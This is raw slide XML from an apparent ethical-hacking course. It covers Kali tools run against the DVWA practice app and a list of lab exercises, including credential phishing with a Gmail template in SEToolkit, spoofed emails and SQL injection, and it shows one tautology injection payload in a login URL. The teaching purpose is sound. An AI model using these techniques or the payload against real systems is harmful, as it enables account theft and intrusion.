        <p:spPr>
          <a:xfrm>
            <a:off x="649825" y="1017725"/>
            <a:ext cx="7545975" cy="3820974"/>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17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INITIALIZING DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p177"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="958475"/>
            <a:ext cx="8423650" cy="4068599"/>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17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INITIALIZING DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p178"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529938" y="916125"/>
            <a:ext cx="8084126" cy="4121549"/>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7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CONNECTING DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p179"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="1017725"/>
            <a:ext cx="7442504" cy="382097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8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WEB BASED MACHINE ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p180"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861725" y="1017725"/>
            <a:ext cx="3859964"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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="Google Shape;291;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="920750"/>
            <a:ext cx="9144000" cy="407352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181"/>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DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p181"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1064300"/>
            <a:ext cx="8364355" cy="382097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18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NMAP ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1235" name="Google Shape;1235;p182"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="287975" y="1017725"/>
            <a:ext cx="8568059" cy="3820974"/>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8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DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p183"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1800225" y="1212475"/>
            <a:ext cx="5543550" cy="347662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184"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916075" y="445025"/>
            <a:ext cx="2916300" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IFCONFIG ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1247" name="Google Shape;1247;p184"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348300" y="318025"/>
            <a:ext cx="4620669" cy="4698474"/>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85"/>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MACCHANGER ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p185"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="522800" y="1127775"/>
            <a:ext cx="7578353" cy="382097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18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WIRESHARK ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p186"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459575" y="1017725"/>
            <a:ext cx="4600890" cy="3820976"/>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18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WIRESHARK ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1017725"/>
            <a:ext cx="8473025" cy="3977601"/>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18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NMAP ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1271" name="Google Shape;1271;p188"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226500" y="1127800"/>
            <a:ext cx="8280714" cy="382097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8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WIRESHARK ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p189"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="135025" y="1064300"/>
            <a:ext cx="8697267" cy="382097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19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TRACEROUTE ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="184150" y="1017725"/>
            <a:ext cx="8574349" cy="4062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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Google Shape;298;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="63500" y="1068900"/>
            <a:ext cx="9144000" cy="372427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191"/>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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DIRB ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1289" name="Google Shape;1289;p191"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715388" y="880150"/>
            <a:ext cx="5713227" cy="4125775"/>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19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NIKTO ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1295" name="Google Shape;1295;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164175" y="1017725"/>
            <a:ext cx="7122576" cy="382097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19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SQLMAP ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p193"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="1074875"/>
            <a:ext cx="5707582" cy="382097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194"/>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SETOOLKIT ON DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1307" name="Google Shape;1307;p194"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279650" y="916125"/>
            <a:ext cx="4254314" cy="4227374"/>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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="424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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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196"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2586759" y="870449"/>
            <a:ext cx="4914300" cy="34026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en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>STEP 1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>FINDING THE INPUT FIELD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p196"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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165</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1319" name="Google Shape;1319;p196"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-2730446">
            <a:off x="-211267" y="2423981"/>
            <a:ext cx="2036516" cy="1238202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1320" name="Google Shape;1320;p196"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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197"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894258" y="3782655"/>
            <a:ext cx="2249743" cy="1367843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1327" name="Google Shape;1327;p197"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773071" y="2733768"/>
            <a:ext cx="5485971" cy="2291007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1328" name="Google Shape;1328;p197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223629" y="267270"/>
            <a:ext cx="6155700" cy="8667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en" sz="3000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>GET BASED INJECTION</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1329" name="Google Shape;1329;p197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="89502" y="1072990"/>
            <a:ext cx="8597400" cy="3875100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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In the GET based injection the parameters taken from the user is passing through the URL (Uniform Resource Locator) based on the parameter that passed on the URL the server process the HTTP request and create the query of the database in this case the pen tester can directly inject the malicious code in to the URL itself to get compromise.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30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E.g: http://www.login.php?user=”admin@gmail.com”&amp;password=”admin” here the attacker should insert the malicious code in the URL itself in such a way http://www.login.php?user=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1”or “1”=”1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>”&amp;password=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1”or “1”=”1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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166</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p197"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
